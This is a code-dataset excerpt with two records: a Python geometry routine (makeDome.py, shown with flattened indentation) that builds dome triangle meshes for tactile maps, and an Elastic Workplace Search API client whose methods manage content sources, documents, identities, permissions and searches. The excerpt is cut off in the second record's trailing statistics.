d09d70d8f12e6e2b90f8c7cb1ea0b5d72765ef45
|
[
"MIT"
] | null | null | null |
makeDome.py
|
bttaylor/TactileMaps
|
d09d70d8f12e6e2b90f8c7cb1ea0b5d72765ef45
|
[
"MIT"
] | null | null | null |
from shapely.geometry import box, Polygon, LineString, Point, MultiLineString, MultiPolygon
import math
import elevation2stl
# def makeDome(r,center,coarseness):
# (tri,outer) = makeCircle(r,center,coarseness);
# for i in range(0,len(tri)):
# p1 = [tri[i][0].x,tri[i][0].y,tri[i][0].z]
# p2 = [tri[i][1].x,tri[i][1].y,tri[i][1].z]
# p3 = [tri[i][2].x,tri[i][2].y,tri[i][2].z]
# elevation2stl.printTriangle(p1,p2,p3,fname)
def makeCircle(r,center,coarseness,z_adj=0):
inner_pts = [Point(center.x, center.y, r + z_adj)];
#print 'Row 0: '
#print inner
triangles = [];
row_cnt = coarseness + 1;
phi = (math.pi/2)/coarseness;
for i in range(0,coarseness):
#inner_r = r * math.sin(i * phi);
#inner_z = r * math.cos(i * phi);
outer_r = r * math.sin((i+1) * phi);
outer_z = r * math.cos((i+1) * phi);
tri_row = i + 1;
#print 'Row ' + str(tri_row) + ': '
#calc points for inner row
theta = (math.pi/2)/tri_row;
#first point (along the axis)
x1 = center.x + outer_r * math.sin(0 * theta)
y1 = center.y + outer_r * math.cos(0 * theta)
outer_pts = [Point(x1,y1,outer_z + z_adj)];
#print [x1, y1, outer_z]
for j in range(0,tri_row):
#next j points
x2 = center.x + outer_r * math.sin((j+1) * theta);
y2 = center.y + outer_r * math.cos((j+1) * theta);
outer_pts.append(Point(x2,y2,outer_z + z_adj))
#print [x2, y2, outer_z]
triangles.append([inner_pts[0],outer_pts[0],outer_pts[1]])
tri_count = 1 + (len(inner_pts)-1)*2;
for j in range(1,len(inner_pts)):
#one quandrant
triangles.append([inner_pts[j-1], outer_pts[j], inner_pts[j]]);
triangles.append([inner_pts[j], outer_pts[j], outer_pts[j+1]])
inner_pts = outer_pts;
all_outer = outer_pts[0:len(outer_pts)-1];
rotate = math.pi/2;
inner_pts = [Point(center.x, center.y, r + z_adj)];
for i in range(0,coarseness):
#inner_r = r * math.sin(i * phi);
#inner_z = r * math.cos(i * phi);
outer_r = r * math.sin((i+1) * phi);
outer_z = r * math.cos((i+1) * phi);
tri_row = i + 1;
#print 'Row ' + str(tri_row) + ': '
#calc points for inner row
theta = (math.pi/2)/tri_row;
#first point (along the axis)
x1 = center.x + outer_r * math.sin(0 * theta + rotate)
y1 = center.y + outer_r * math.cos(0 * theta + rotate)
outer_pts = [Point(x1,y1,outer_z + z_adj)];
#print [x1, y1, outer_z]
for j in range(0,tri_row):
#next j points
x2 = center.x + outer_r * math.sin((j+1) * theta + rotate);
y2 = center.y + outer_r * math.cos((j+1) * theta + rotate);
outer_pts.append(Point(x2,y2,outer_z + z_adj))
#print [x2, y2, outer_z]
triangles.append([inner_pts[0],outer_pts[0],outer_pts[1]])
tri_count = 1 + (len(inner_pts)-1)*2;
for j in range(1,len(inner_pts)):
#one quandrant
triangles.append([inner_pts[j-1], outer_pts[j], inner_pts[j]]);
triangles.append([inner_pts[j], outer_pts[j], outer_pts[j+1]])
inner_pts = outer_pts;
all_outer = all_outer + outer_pts[0:len(outer_pts)-1];
#there is overlap w/ the points and the mirror technique places the duplicate in
#either first or last index depending on how it was mirrored
rotate = math.pi
inner_pts = [Point(center.x, center.y, r + z_adj)];
for i in range(0,coarseness):
#inner_r = r * math.sin(i * phi);
#inner_z = r * math.cos(i * phi);
outer_r = r * math.sin((i+1) * phi);
outer_z = r * math.cos((i+1) * phi);
tri_row = i + 1;
#print 'Row ' + str(tri_row) + ': '
#calc points for inner row
theta = (math.pi/2)/tri_row;
#first point (along the axis)
x1 = center.x + outer_r * math.sin(0 * theta + rotate)
y1 = center.y + outer_r * math.cos(0 * theta + rotate)
outer_pts = [Point(x1,y1,outer_z + z_adj)];
#print [x1, y1, outer_z]
for j in range(0,tri_row):
#next j points
x2 = center.x + outer_r * math.sin((j+1) * theta + rotate);
y2 = center.y + outer_r * math.cos((j+1) * theta + rotate);
outer_pts.append(Point(x2,y2,outer_z + z_adj))
#print [x2, y2, outer_z]
triangles.append([inner_pts[0],outer_pts[0],outer_pts[1]])
tri_count = 1 + (len(inner_pts)-1)*2;
for j in range(1,len(inner_pts)):
#one quandrant
triangles.append([inner_pts[j-1], outer_pts[j], inner_pts[j]]);
triangles.append([inner_pts[j], outer_pts[j], outer_pts[j+1]])
inner_pts = outer_pts;
all_outer = all_outer + outer_pts[0:len(outer_pts)-1];
rotate = 3*math.pi/2;
inner_pts = [Point(center.x, center.y, r + z_adj)];
for i in range(0,coarseness):
#inner_r = r * math.sin(i * phi);
#inner_z = r * math.cos(i * phi);
outer_r = r * math.sin((i+1) * phi);
outer_z = r * math.cos((i+1) * phi);
tri_row = i + 1;
#print 'Row ' + str(tri_row) + ': '
#calc points for inner row
theta = (math.pi/2)/tri_row;
#first point (along the axis)
x1 = center.x + outer_r * math.sin(0 * theta + rotate)
y1 = center.y + outer_r * math.cos(0 * theta + rotate)
outer_pts = [Point(x1,y1,outer_z + z_adj)];
#print [x1, y1, outer_z]
for j in range(0,tri_row):
#next j points
x2 = center.x + outer_r * math.sin((j+1) * theta + rotate);
y2 = center.y + outer_r * math.cos((j+1) * theta + rotate);
outer_pts.append(Point(x2,y2,outer_z + z_adj))
#print [x2, y2, outer_z]
triangles.append([inner_pts[0],outer_pts[0],outer_pts[1]])
tri_count = 1 + (len(inner_pts)-1)*2;
for j in range(1,len(inner_pts)):
#one quandrant
triangles.append([inner_pts[j-1], outer_pts[j], inner_pts[j]]);
triangles.append([inner_pts[j], outer_pts[j], outer_pts[j+1]])
inner_pts = outer_pts;
all_outer = all_outer + outer_pts[0:len(outer_pts)-1];
return (triangles, all_outer)
| 31.767045
| 91
| 0.630656
| 1,015
| 5,591
| 3.314286
| 0.0867
| 0.095125
| 0.03805
| 0.082045
| 0.850773
| 0.850773
| 0.84126
| 0.84126
| 0.84126
| 0.832937
| 0
| 0.034559
| 0.187444
| 5,591
| 175
| 92
| 31.948571
| 0.705921
| 0.244142
| 0
| 0.824176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010989
| false
| 0
| 0.032967
| 0
| 0.054945
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4818dc86f9fb3c156ecd708cae494e47fdfcdb0b
| 38,838
|
py
|
Python
|
project/workplace_search.py
|
gujralsanyam22/elastic_enterprise_search_app
|
0ceec37d249006c2ef5d6415e1f5507df642deed
|
[
"Apache-2.0"
] | null | null | null |
project/workplace_search.py
|
gujralsanyam22/elastic_enterprise_search_app
|
0ceec37d249006c2ef5d6415e1f5507df642deed
|
[
"Apache-2.0"
] | null | null | null |
project/workplace_search.py
|
gujralsanyam22/elastic_enterprise_search_app
|
0ceec37d249006c2ef5d6415e1f5507df642deed
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from elastic_transport import QueryParams
from .._utils import ( # noqa: F401
DEFAULT,
SKIP_IN_PATH,
to_array,
to_deep_object,
to_path,
)
from ._base import BaseClient
class WorkplaceSearch(BaseClient):
def create_analytics_event(
self,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Capture click and feedback analytic events
`<https://www.elastic.co/guide/en/workplace-search/current/workplace-search-analytics-api.html>`_
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
"""
params = QueryParams(params)
return self.perform_request(
"POST",
"/api/ws/v1/analytics/event",
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def create_content_source(
self,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Create a content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#create-content-source-api>`_
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
params = QueryParams(params)
return self.perform_request(
"POST",
"/api/ws/v1/sources",
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def delete_content_source(
self,
content_source_id,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Deletes a content source by ID
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#remove-content-source-api>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"DELETE",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def get_content_source(
self,
content_source_id,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves a content source by ID
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#get-content-source-api>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def put_content_source(
self,
content_source_id,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Update a content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#update-content-source-api>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"PUT",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
),
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def list_content_sources(
self,
current_page=None,
page_size=None,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves all content sources
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#list-content-sources-api>`_
:arg current_page: Which page of results to request
:arg page_size: The number of results to return in a page
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
params = QueryParams(params)
if current_page is not None:
params.add("page[current]", current_page)
if page_size is not None:
params.add("page[size]", page_size)
return self.perform_request(
"GET",
"/api/ws/v1/sources",
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def get_document(
self,
content_source_id,
document_id,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves a document by ID from the specified content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#get-document-by-id-api>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg document_id: Unique ID for a content source document. Provided upon
or returned at creation.
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
document_id,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"documents",
document_id,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def delete_documents(
self,
content_source_id,
document_ids,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Deletes a list of documents from a custom content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-custom-sources-api.html#delete-by-id>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg document_ids: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
:raises elastic_enterprise_search.PayloadTooLargeError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"POST",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"documents",
"bulk_destroy",
),
body=document_ids,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def delete_all_documents(
self,
content_source_id,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Deletes all documents in a custom content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-custom-sources-api.html#delete-all-documents>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"DELETE",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"documents",
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def index_documents(
self,
content_source_id,
documents,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Indexes one or more new documents into a custom content source, or updates one
or more existing documents
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-custom-sources-api.html#index-and-update>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg documents: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
:raises elastic_enterprise_search.PayloadTooLargeError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"POST",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"documents",
"bulk_create",
),
body=documents,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def list_external_identities(
self,
content_source_id,
current_page=None,
page_size=None,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves all external identities
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#list-external-identities>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg current_page: Which page of results to request
:arg page_size: The number of results to return in a page
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
if current_page is not None:
params.add("page[current]", current_page)
if page_size is not None:
params.add("page[size]", page_size)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"external_identities",
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def create_external_identity(
self,
content_source_id,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Adds a new external identity
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#add-external-identity>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"POST",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"external_identities",
),
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def delete_external_identity(
self,
content_source_id,
user,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Deletes an external identity
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#remove-external-identity>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg user: The username in context
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
user,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"DELETE",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"external_identities",
user,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def get_external_identity(
self,
content_source_id,
user,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves an external identity
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#show-external-identity>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg user: The username in context
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
user,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"external_identities",
user,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def put_external_identity(
self,
content_source_id,
user,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Updates an external identity
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#update-external-identity>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg user: The username in context
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
user,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"PUT",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"external_identities",
user,
),
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def list_permissions(
self,
content_source_id,
current_page=None,
page_size=None,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Lists all permissions for all users
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#list>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg current_page: Which page of results to request
:arg page_size: The number of results to return in a page
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.PaymentRequiredError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
if current_page is not None:
params.add("page[current]", current_page)
if page_size is not None:
params.add("page[size]", page_size)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"permissions",
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def remove_user_permissions(
self,
content_source_id,
user,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Removes one or more permissions from an existing set of permissions
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#remove-one>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg user: The username in context
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.PaymentRequiredError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
user,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"POST",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"permissions",
user,
"remove",
),
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def search(
self,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Search across available sources with various query tuning options
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-search-api.html>`_
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
"""
params = QueryParams(params)
return self.perform_request(
"POST",
"/api/ws/v1/search",
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def add_user_permissions(
self,
content_source_id,
user,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Adds one or more new permissions atop existing permissions
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#add-one>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg user: The username in context
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.PaymentRequiredError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
user,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"POST",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"permissions",
user,
"add",
),
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def get_user_permissions(
self,
content_source_id,
user,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Lists all permissions for one user
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#list-one>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg user: The username in context
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.PaymentRequiredError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
user,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"permissions",
user,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def put_user_permissions(
self,
content_source_id,
user,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Creates a new set of permissions or over-writes all existing permissions
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#add-all>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg user: The username in context
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.PaymentRequiredError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
user,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"PUT",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"permissions",
user,
),
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
| 36.60509
| 140
| 0.584428
| 4,155
| 38,838
| 5.298195
| 0.05006
| 0.050195
| 0.046334
| 0.037204
| 0.926002
| 0.91946
| 0.918143
| 0.916735
| 0.914963
| 0.914963
| 0
| 0.001111
| 0.351074
| 38,838
| 1,060
| 141
